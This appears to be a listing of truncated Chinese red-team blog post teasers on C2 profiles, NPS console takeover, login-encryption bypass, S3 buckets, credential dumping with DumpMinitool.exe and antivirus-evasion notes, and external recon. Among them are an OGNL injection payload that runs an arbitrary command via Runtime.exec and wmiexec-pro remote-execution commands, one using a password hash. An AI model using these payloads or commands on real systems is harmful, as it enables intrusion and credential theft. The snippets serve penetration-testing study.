edit-gencon 学习一下 TryGOTry 师傅，项目基本都配置好只需要改动相关参数即可，个人推荐这种方式，CrossC2 坑比较多 https://github.com/TryGOTry/edit-gencon 使用项目中的 gmail.profile 作...

红队反制 - 接管 NPS 控制台 最近看到有意思的东西，参考千寻瀑的文章复现了一下 https://github.com/ehang-io/nps/releases/tag/v0.26.10 到 github 上下载相应的版本，我这里用的 win 就下载 ...

登陆口 js 前端加密绕过 环境搭建 1、首先得安装 maven，具体方法百度 2、下载 https://github.com/c0ny1/jsEncrypter c0ny1 师傅写好的 burp 插件 运行 mvn package 进行编译，编译...

面向对象的存储，也被称为云存储，云存储主要分为三部分，分别是 key、data 和 Metadata 假设一个地址为 http//aaa.s3.ap-northeast-2.amazonaws.c/bbb 这里aaa为存储桶的名称，...

DumpMinitool.exe 经测试，360 和卡巴拦截，火绒正常 Visual Studio 2022 的一个程序，使用这个需要安装扩展开发 C:Program FilesMicrosoft Visual Studio2022CommunityCommon7IDEExtensionsTes...

/${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('COMMAND').getInputStream(),'utf-8')).(@com.opensymphony.webwork.ServletActionContext@getRespons...

135 端口 执行命令 python wmiexec-pro.py administrator:[email protected] exec-command -command 'whoami' -with-output python wmiexec-pro.py -hashes :5571e12eef026de606df1ff9...

渗透测试过程中，可能会碰到以 wsdl 结尾的站点 这时候可以通过 soapUI 进行测试会比较方便 https://github.com/SmartBear/soapui 下载完成后，点击 soapui.bat 运行程序，直接点击 jar 包运行...

前言 正如今年的高考题目，学习应从本手开始，把基础打好，才能在实战中打出妙手操作，如果眼高手低，往往会落到俗手的下场 这次攻防演练每个队伍分配不同的目标，有些队伍拿的点可以直接 nday ...

外网打点 资产识别 使用 Ehole 快速识别重点资产 链接：https://github.com/EdgeSecurityTeam/EHole Ehole.exe -fofa 检测的域名 寻找口子 1、每个网站可以尝试默认密码或’admin’、1qazxsw2==...